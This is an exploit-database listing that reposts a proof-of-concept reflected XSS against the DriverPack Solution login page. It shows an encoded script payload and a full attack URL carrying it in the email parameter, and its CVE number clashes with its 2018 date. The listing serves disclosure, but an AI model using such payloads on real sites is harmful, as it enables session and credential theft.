Advertisement






DriverPack Solution authentication Xss Vulnerability

CVE Category Price Severity
CVE-2021-38307 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-04-22
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02151 0.02748

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040173

Below is a copy:

DriverPack Solution authentication Xss Vulnerability
====================================================================================================================================
| # Title     : DriverPack Solution authentication Xss Vulnerability                                                                        |
| # Author    : indoushka                                                                                                          |
| # Telegram  : @indoushka                                                                                                         |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |                                                                                                           |
| # Vendor    : http://drp.su/                                                                                                     |  
| # Dork      : n/a                                                                                                                |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine 

[+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb

http://auth.drp.su/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.